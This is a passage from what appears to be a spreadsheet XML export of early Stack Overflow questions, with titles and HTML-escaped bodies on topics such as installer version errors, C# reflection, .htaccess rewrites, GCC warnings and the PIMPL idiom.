&lt;p&gt;How can we improve our application's performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS 2005 Installer Project Version Number</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting this error now that I hit version number 1.256.0:
Error   4	Invalid product version '1.256.0'. Must be of format '##.##.####'&lt;/p&gt;
&lt;p&gt;The installer was fine with 1.255.0 but something with 256 (2^8) it doesn't like.  I found this stated on msdn.com:
The Version property must be formatted as N.N.N, where each N represents at least one and no more than four digits. (&lt;a href="http://msdn.microsoft.com/en-us/library/d3ywkte8" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/d3ywkte8&lt;/a&gt;(VS.80).aspx)&lt;/p&gt;
&lt;p&gt;Which would make me believe there is nothing wrong 1.256.0 because it meets the rules stated above.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas on why this would be failing now?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do I need to know to globalize an asp.net application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an asp.net application that will need to be localized to several regions other than North America.  What do I need to do to prepare for this globalization?  What are your top 1 to 2 resources for learning how to write a world ready application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I disable validation in Web Data Administrator?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to run some queries to get rid of XSS in our database using Web Data Administrator but I keep running into this Potentially Dangerous Request crap.&lt;/p&gt;
&lt;p&gt;How do I disable validation of the query in Web Data Administrator?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do I Load an Assembly and All of its Dependencies at Runtime in C# for Reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a utility for myself, partly as an exercise in learning C# Reflection and partly because I actually want the resulting tool for my own use.&lt;/p&gt;
&lt;p&gt;What I'm after is basically pointing the application at an assembly and choosing a given class from which to select properties that should be included in an exported HTML form as fields. That form will be then used in my ASP.NET MVC app as the beginning of a View.&lt;/p&gt;
&lt;p&gt;As I'm using Subsonic objects for the applications where I want to use, this should be reasonable and I figured that, by wanting to include things like differing output HTML depending on data type, Reflection was the way to get this done.&lt;/p&gt;
&lt;p&gt;What I'm looking for, however, seems to be elusive. I'm trying to take the DLL/EXE that's chosen through the OpenFileDialog as the starting point and load it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String FilePath = Path.GetDirectoryName(FileName);
System.Reflection.Assembly o = System.Reflection.Assembly.LoadFile(FileName);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That works fine, but because Subsonic-generated objects actually are full of object types that are defined in Subsonic.dll, etc., those dependent objects aren't loaded. Enter:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AssemblyName[] ReferencedAssemblies = o.GetReferencedAssemblies();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That, too, contains exactly what I would expect it to. However, what I'm trying to figure out is how to load those assemblies so that my digging into my objects will work properly. I understand that if those assemblies were in the GAC or in the directory of the running executable, I could just load them by their name, but that isn't likely to be the case for this use case and it's my primary use case.&lt;/p&gt;
&lt;p&gt;So, what it boils down to is how do I load a given assembly and all of its arbitrary assemblies starting with a filename and resulting in a completely Reflection-browsable tree of types, properties, methods, etc.&lt;/p&gt;
&lt;p&gt;I know that tools like Reflector do this, I just can't find the syntax for getting at it. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to rollout web applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a standard way of rolling out web applications for our company.  Currently we do it with zip files, vbscript/javascript, and manual some steps.  &lt;/p&gt;
&lt;p&gt;For thick client installs we generate MSI installers using Wise/Wix.  We don't create installers currently for websites as in general they are just xcopy deploy.  However we have some config files that need to be changed, verify that certain handlers are registered in IIS...  The list goes on.&lt;/p&gt;
&lt;p&gt;Do most people use MSI installers for web applications as well, or some other tool/scripting language?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically change combobox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to update a &lt;code&gt;combobox&lt;/code&gt; with a new value so it changes the reflected text in it. The cleanest way to do this is after the &lt;code&gt;combobox&lt;/code&gt;has been initialised and with a message.&lt;/p&gt;
&lt;p&gt;So I am trying to craft a &lt;code&gt;postmessage&lt;/code&gt; to the hwnd that contains the &lt;code&gt;combobox&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So if I want to send a message to it, changing the currently selected item to the nth item, what would the &lt;code&gt;postmessage&lt;/code&gt; look like?&lt;/p&gt;
&lt;p&gt;I am guessing that it would involve &lt;code&gt;ON_CBN_SELCHANGE&lt;/code&gt;, but I can't get it to work right.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wildcard Subdomain Exceptions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a wildcard subdomain enabled and dynamically parse the URL by passing it as-is to my &lt;code&gt;index.php&lt;/code&gt; (ex. &lt;code&gt;somecity.domain.com&lt;/code&gt;).  &lt;/p&gt;
&lt;p&gt;Now, I wish to create a few subdomains that are static where I can install different application and not co-mingle with my current one (ex. &lt;code&gt;blog.domain.com&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;My &lt;code&gt;.htaccess&lt;/code&gt; currently reads:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I manipulate this &lt;code&gt;.htaccess&lt;/code&gt; to achieve what I need? Can it be done through Apache?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ColdFusion: Is it safe to leave out the variables keyword in a CFC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a ColdFusion Component (CFC), is it necessary to use fully qualified names for variables-scoped variables?&lt;/p&gt;
&lt;p&gt;Am I going to get myself into trouble if I change this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfcomponent&amp;gt;
    &amp;lt;cfset variables.foo = "a private instance variable"&amp;gt;
    &amp;lt;cffunction name = "doSomething"&amp;gt;
    	&amp;lt;cfset var bar = "a function local variable"&amp;gt;
    	&amp;lt;cfreturn "I have #variables.foo# and #bar#."&amp;gt;
    &amp;lt;/cffunction&amp;gt;
&amp;lt;/cfcomponent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfcomponent&amp;gt;
    &amp;lt;cfset foo = "a private instance variable"&amp;gt;
    &amp;lt;cffunction name = "doSomething"&amp;gt;
    	&amp;lt;cfset var bar = "a function local variable"&amp;gt;
    	&amp;lt;cfreturn "I have #foo# and #bar#."&amp;gt;
    &amp;lt;/cffunction&amp;gt;
&amp;lt;/cfcomponent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Most effective form of CAPTCHA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Of all the forms of CAPTCHA available, which one is the "least crackable" while remaining fairly human readable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>lock keyword in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand the main function of the lock key word from MSDN&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;lock Statement (C# Reference)&lt;/p&gt;
  &lt;p&gt;The lock keyword marks a statement
  block as a critical section by
  obtaining the mutual-exclusion lock
  for a given object, executing a
  statement, and then releasing the
  lock.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When should the lock be used?  &lt;/p&gt;
&lt;p&gt;For instance it makes sense with multi-threaded applications because it protects the data.  But is it necessary when the application does not spin off any other threads?&lt;/p&gt;
&lt;p&gt;Is there performance issues with using lock?&lt;/p&gt;
&lt;p&gt;I have just inherited an application that is using lock everywhere, and it is single threaded and I want to know should I leave them in, are they even necessary?&lt;/p&gt;
&lt;p&gt;Please note this is more of a general knowledge question, the application speed is fine, I want to know if that is a good design pattern to follow in the future or should this be avoided unless absolutely needed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get rid of `deprecated conversion from string constant to â€˜char*â€™` warnings in GCC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm working on an exceedingly large codebase, and recently upgraded to gcc 4.3, which now triggers this warning:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;warning: deprecated conversion from string constant to â€˜char*â€™&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Obviously, the correct way to fix this is to find every declaration like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *s = "constant string";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or function call like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void foo(char *s);
foo("constant string");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and make them &lt;code&gt;const char&lt;/code&gt; pointers.  However, that would mean touching 564 files, minimum, which is not a task I wish to perform at this point in time.  The problem right now is that I'm running with &lt;code&gt;-werror&lt;/code&gt;, so I need some way to stifle these warnings.  How can I do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In a LotusScript Agent how do you get the name of the current server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a LotusScript Agent that is being run via WebQueryOpen, how do you get the name of the current server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to transfer an xml to SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been hearing the podcast blog for a while, I hope I dont break this. 
The question is this: I have to insert an xml to a database. This will be for already defined tables and fields. So what is the best way to accomplish this? So far I am leaning toward programatic. I have been seeing varios options, one is Data Transfer Objects (DTO), in the SQL Server there is the sp_xml_preparedocument that is used to get transfer XMLs to an object and throught code. &lt;/p&gt;
&lt;p&gt;I am using CSharp and SQL Server 2005. The fields are not XML fields, they are the usual SQL datatypes. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>bug in linq Contains statement - is there a fix or workaround?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found a bug in the Contains statement in Linq (not sure if it is really in Linq or Linq to SQL) and want to know if anyone else has seen this and if there is a fix or workaround.&lt;/p&gt;
&lt;p&gt;If the querysource you do the contains with has more than 10 items in it, it does not pass the items correctly to the SQL query. It is hard to explain what it does, an example will show it best.&lt;/p&gt;
&lt;p&gt;If you look at the raw query, the parameters look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@P0 = 'aaa'
@P1 = 'bbb'
@P2 = 'ccc'
... [@P3 through @P9]
@P10 = '111'
@P11 = '222'
... [@p12 through @P19]
@P20 = 'sss'
... [@P21 through @P99]
@P100 = 'qqq'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when the values are passed into the final query (all parameters resolved) it has resolved the parameters as if these were the values passed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@P0 = 'aaa'
@P1 = 'bbb'
@P2 = 'ccc'
...
@P10 = 'bbb'0
@P11 = 'bbb'1
...
@P20 = 'ccc'0
...
@P100 = 'bbb'00
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it looks like the parameter resolving looks at the first digit only after the &lt;code&gt;@P&lt;/code&gt; and resolves that, then adds on anything left at the end of the parameter name.&lt;/p&gt;
&lt;p&gt;At least that is what the Sql Server Query Visualizer plugin to Visual Studio shows the query doing.&lt;/p&gt;
&lt;p&gt;Really strange.&lt;/p&gt;
&lt;p&gt;So if any one has advice please share. Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;br&gt;
I have rewritten the original linq statement to where I now use a join instead of the Contains, but would still like to know if there is a way around this issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a spring bean for a Java double primitive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to create a spring bean that holds the value of a double.     Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;bean id="doubleValue" value="3.7"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Are Stored Procedures more efficient, in general, than inline statements on modern RDBMS's?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Conventional wisdom states that stored procedures are always faster. So, since they're always faster, use them &lt;strong&gt;ALL THE TIME&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I am pretty sure this is grounded in some historical context where this was once the case. Now, I'm not advocating that Stored Procs are not needed, but I want to know in what cases stored procs are necessary in modern databases such as MySql, SqlServer, Oracle, or . Is it overkill to have ALL access through stored procs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ inheritance and member function pointers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C++, can member function pointers be used to point to derived (or even base) class members? &lt;/p&gt;
&lt;p&gt;EDIT: 
Perhaps an example will help. Suppose we have a hierarchy of three classes &lt;code&gt;X&lt;/code&gt;, &lt;code&gt;Y&lt;/code&gt;, &lt;code&gt;Z&lt;/code&gt; in order of inheritance. 
&lt;code&gt;Y&lt;/code&gt; therefore has a base class &lt;code&gt;X&lt;/code&gt; and a derived class &lt;code&gt;Z&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now we can define a member function pointer &lt;code&gt;p&lt;/code&gt; for class &lt;code&gt;Y&lt;/code&gt;. This is written as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void (Y::*p)();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(For simplicity, I'll assume we're only interested in functions with the signature &lt;code&gt;void f()&lt;/code&gt; )  &lt;/p&gt;
&lt;p&gt;This pointer &lt;code&gt;p&lt;/code&gt; can now be used to point to member functions of class &lt;code&gt;Y&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This question (two questions, really) is then:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Can &lt;code&gt;p&lt;/code&gt; be used to point to a function in the derived class &lt;code&gt;Z&lt;/code&gt;?&lt;/li&gt;
&lt;li&gt;Can &lt;code&gt;p&lt;/code&gt; be used to point to a function in the base class &lt;code&gt;X&lt;/code&gt;?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How do you resize an IE browser window to 1024 x 768</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Firefox you can enter the following into the awesome bar and hit enter:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;javascript:self.resizeTo(1024,768);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do you do the same thing in IE?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a child's PID?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently in an operating systems class and my teacher spent half of the class period talking about PIDs. She mentioned, as many know, that processes know their parent's ID.&lt;/p&gt;
&lt;p&gt;My question is this:&lt;/p&gt;
&lt;p&gt;Does a process's PCB know its child's ID? If so, what is the way to go about it obtaining it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C# (or any language) what is/are your favourite way of removing repetition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just coded a 700 line class. Awful. I hang my head in shame.  It's as opposite to DRY as a British summer.&lt;/p&gt;
&lt;p&gt;It's full of cut and paste with minor tweaks here and there.  This makes it's a prime candidate for refactoring.  Before I embark on this, I'd thought I'd ask when you have lots of repetition, what are the first refactoring opportunities you look for?&lt;/p&gt;
&lt;p&gt;For the record, mine are probably using:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Generic classes and methods&lt;/li&gt;
&lt;li&gt;Method overloading/chaining.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What are yours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to escape text for regular expression in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does Java have a built-in way to escape arbitrary text so that it can be included in a regular expression? For example, if my users enter "$5", I'd like to match that exactly rather than a "5" after the end of input.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>My first Lisp macro; is it leaky?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working through &lt;a href="http://gigamonkeys.com/book" rel="nofollow"&gt;Practical Common Lisp&lt;/a&gt; and as an exercise decided to write a macro to determine if a number is a multiple of another number:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;(defmacro multp (value factor)&lt;br /&gt;
   `(= (rem ,value ,factor)  0))&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;so that :
&lt;code&gt;(multp 40 10)&lt;/code&gt;
evaluates to true whilst
&lt;code&gt;(multp 40 13)&lt;/code&gt;
does not &lt;/p&gt;
&lt;p&gt;The question is does this macro &lt;a href="http://gigamonkeys.com/book/macros-defining-your-own.html#plugging-the-leaks" rel="nofollow"&gt;leak&lt;/a&gt; in some way?  Also is this "good" Lisp?  Is there already an existing function/macro that I could have used?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I change the appearance of an html image during hover without a second image?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to change the appearance of an icon (ie. contrast / luminosity) when I hover the cursor, without requiring a second image file (or without requiring a hidden portion of the image)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Here are fifteen characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I will never understand why the SE network insists that every worthless question has to exist forever.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best strategies for using multiple AJAX libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What experience can you share about using multiple AJAX libraries?&lt;/p&gt;
&lt;p&gt;There are useful features in Prototype, some in jQuery, the Yahoo library, etc. Is it possible to include all libraries and use what you want from each, do they generally all play nicely together with name spaces, etc. For the sake of speed is there a practical limit to the size/number of libraries to include or is this negligible? Are there pairs that work particularly well together (e.g. Prototype/Scriptaculous) or pairs that don't?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>loading Java classes from a signed applet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I'm running a signed Java applet, can I load additional classes from remote sources (in the same domain, maybe even the same host) and run them?&lt;/p&gt;
&lt;p&gt;I'd like to do this without changing pages or even stopping the current applet. Of course, the total size of all classes is too large to load them all at once.&lt;/p&gt;
&lt;p&gt;Is there a way to do this? And is there a way to do this with signed applets and preserve their "confidence" status?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why should the "PIMPL" idiom be used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Backgrounder:&lt;/p&gt;
&lt;p&gt;The &lt;a href="http://en.wikipedia.org/wiki/Opaque_pointer" rel="nofollow"&gt;PIMPL Idiom&lt;/a&gt; (Pointer to IMPLementation) is a technique for implementation hiding in which a public class wraps a structure or class that cannot be seen outside the library the public class is part of.&lt;/p&gt;
&lt;p&gt;This hides internal implementation details and data from the user of the library.&lt;/p&gt;
&lt;p&gt;When implementing this idiom why would you place the public methods on the pimpl class and not the public class since the public classes method implementations would be compiled into the library and the user only has the header file?&lt;/p&gt;
&lt;p&gt;To illustrate, this code puts the &lt;code&gt;Purr()&lt;/code&gt; implementation on the impl class and wraps it as well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why not implement Purr directly on the public class?&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-c++ prettyprint-override"&gt;&lt;code&gt;// header file:
class Cat {
    private:
        class CatImpl;  // Not defined here
        CatImpl *cat_;  // Handle
    public:
        Cat();            // Constructor
        ~Cat();           // Destructor
        // Other operations...
        Purr();
};
// CPP file:
#include "cat.h"
class Cat::CatImpl {
    Purr();
...     // The actual implementation can be anything
};
Cat::Cat() {
    cat_ = new CatImpl;
}
Cat::~Cat() {
    delete cat_;
}
Cat::Purr(){ cat_-&amp;gt;Purr(); }
CatImpl::Purr(){
   printf("purrrrrr");
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best way to initiate a download?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a PHP-based web site, I want to send users a download package after they have filled out a short form. The site-initiated download should be similar to sites like download.com, which say "your download will begin in a moment."&lt;/p&gt;
&lt;p&gt;A couple of &lt;strong&gt;possible approaches&lt;/strong&gt; I know about, and browser compatibility (based on a quick test):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1) Do a &lt;code&gt;window.open&lt;/code&gt; pointing to the new file.&lt;/strong&gt;  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- FireFox 3 blocks this.  
 - IE6 blocks this.  
 - IE7 blocks this.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;2) Create an iframe pointing to the new file.&lt;/strong&gt;  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- FireFox 3 seems to think this is OK. (Maybe it's because I already accepted it once?)  
 - IE6 blocks this.  
 - IE7 blocks this.
How can I do this so that at least these three browsers will not object? 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bonus: is there a method that doesn't require browser-conditional statements? &lt;/p&gt;
&lt;p&gt;(I believe that download.com employs both methods conditionally, but I can't get either one to work.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Responses and Clarifications:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Q: "Why not point the current window to the file?"  
A: That might work, but in this particular case, I want to show them some other content while their download starts - for example, "would you like to donate to this project?"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;UPDATE: I have abandoned this approach. See my answer below for reasons.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting started with Silverlight development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does one start development in Silverlight?&lt;/p&gt;
&lt;p&gt;Does one need a new IDE? or Visual studio will support?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - Is it possible to trigger a postback from server code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to to programmatically trigger a postback from server code in ASP.NET?  I know that it is possible to do a Response.Redirect or Server.Transfer to redirect to a page, but is there a way to trigger a postback to the same page in server code (&lt;em&gt;i.e.&lt;/em&gt; without using javascript trickery to submit a form)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a python HTTP server to listen on multiple ports?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a small web server in Python, using BaseHTTPServer and a custom subclass of BaseHTTPServer.BaseHTTPRequestHandler. Is it possible to make this listen on more than one port?&lt;/p&gt;
&lt;p&gt;What I'm doing now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def doGET
  [...]
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): 
    pass
server = ThreadingHTTPServer(('localhost', 80), MyRequestHandler)
server.serve_forever()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to determine the value of a controller variable during execution in Ruby on Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way for me to determine a controller variable's value during execution?&lt;/p&gt;
&lt;p&gt;For example, is there a way I can insert a break in the code, and cause the value of the variable to be output to the screen (or the log)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which jQuery plugin should be used to fix the IE6 PNG transparency issue?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an IE6/PNG fix that is officially developed by the jQuery team?&lt;/p&gt;
&lt;p&gt;If not which of the available plugins should I use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing Curl IDE/RTE on AMD processors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Trying to move my development environment to Linux. And new to Curl. Can't get it to install the IDE &amp;amp; RTE packages on an AMD HP PC running Ubuntu x64. I tried to install the Debian package via the package installer and get "Error: Wrong architecture - i386". Tried using the  --force-architecture switch but it errors out. &lt;/p&gt;
&lt;p&gt;I'm assuming Curl IDE will just run under Intel processors? Anyone have any luck with this issue and can advise?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find out how much memory is being used by an object in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a way to find out how much memory an instance of an object is taking?&lt;/p&gt;
&lt;p&gt;For example, if I have an instance of the following object:&lt;/p&gt;
&lt;p&gt;TestClass tc = new TestClass();&lt;/p&gt;
&lt;p&gt;Is there a way to find out how much memory the instance "tc" is taking?&lt;/p&gt;
&lt;p&gt;The reason for asking, is that although C# has built in memory management, I often run into issues with not clearing an instance of an object (e.g. a List that keeps track of something).&lt;/p&gt;
&lt;p&gt;There are couple of reasonably good memory profilers (e.g. ANTS Profiler) but in a multi-threaded environment is pretty hard to figure out what belongs where, even with those tools. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is wrong with using inline functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While it would be very convenient to use inline functions at some situations,&lt;/p&gt;
&lt;p&gt;Are there any drawbacks with inline functions?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Apparently, There is nothing wrong with using inline functions.&lt;/p&gt;
&lt;p&gt;But it is worth noting the following points!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Overuse of inlining can actually make programs slower. Depending on a function's size, inlining it can cause the code size to increase or decrease. Inlining a very small accessor function will usually decrease code size while inlining a very large function can dramatically increase code size. On modern processors smaller code usually runs faster due to better use of the instruction cache. &lt;a href="http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Inline_Functions"&gt;- Google Guidelines&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The speed benefits of inline functions tend to diminish as the function grows in size. At some point the overhead of the function call becomes small compared to the execution of the function body, and the benefit is lost &lt;a href="http://www-rocq.inria.fr/who/Marc.Thiriet/Langages/tic0324.html"&gt;- Source&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There are few situations where an inline function may not work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For a function returning values; if a return statement exists.&lt;/li&gt;
&lt;li&gt;For a function not returning any values; if a loop, switch or goto statement exists. &lt;/li&gt;
&lt;li&gt;If a function is recursive. &lt;a href="http://www-rocq.inria.fr/who/Marc.Thiriet/Langages/tic0324.html"&gt;-Source&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The &lt;code&gt;__inline&lt;/code&gt; keyword causes a function to be inlined only if you specify the optimize option. If optimize is specified, whether or not &lt;code&gt;__inline&lt;/code&gt; is honored depends on the setting of the inline optimizer option. By default, the inline option is in effect whenever the optimizer is run. If you specify optimize , you must also specify the noinline option if you want the &lt;code&gt;__inline&lt;/code&gt; keyword to be ignored. &lt;a href="http://support.sas.com/documentation/onlinedoc/sasc/doc750/html/clug/zcoptinl.htm"&gt;-Source&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Changing the font in Aquamacs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently had a need to do a bit of lisp editing and I found the nifty Ready Lisp package for OS X, which is great, except Aquamacs automatically uses a proportional font (which is idiotic, IMHO) and I want to change it to a monospace font. However, I'm not really much of an EMACS user, and the preferences menu in Aquamacs is less than clear on where and how one might make such a change. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best implementation for DB Audit Trail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A DB Audit Trail captures the User Last Modified, Modified Date, and Created Date.&lt;/p&gt;
&lt;p&gt;There are several possible implementations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;SQL Server Triggers&lt;/li&gt;
&lt;li&gt;Add UserModified, ModifiedDate, CreatedDate columns to the database and include logic in Stored Procedures or Insert, Update statements accordingly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It would be nice if you include implementation (or link to) in your answer.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a better Windows Console Window?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find working on the command line in Windows frustrating, primarily because the console window is wretched to use compared to terminal applications on linux and OS X such as "rxvt", "xterm", or "Terminal".  Major complaints:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;No standard copy/paste.  You have to turn on "mark" mode and it's only available from a multi-level popup triggered by the (small) left hand corner button.  Then copy and paste need to be invoked from the same menu&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You can't arbitrarily resize the window by dragging, you need to set a preference (back to the multi-level popup) each time you want to resize a window&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You can only make the window so big before horizontal scroll bars enter the picture. Horizontal scroll bars suck.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;With the cmd.exe shell, you can't navigate to folders with \\netpath notation (UNC?), you need to map a network drive.  This sucks when working on multiple machines that are going to have different drives mapped&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Are there any tricks or applications, (paid or otherwise), that address these issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Development directory Structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering what  directory structure are commonly used in development projects. I mean with the idea of facilitating builds, deploys release, and etc.&lt;/p&gt;
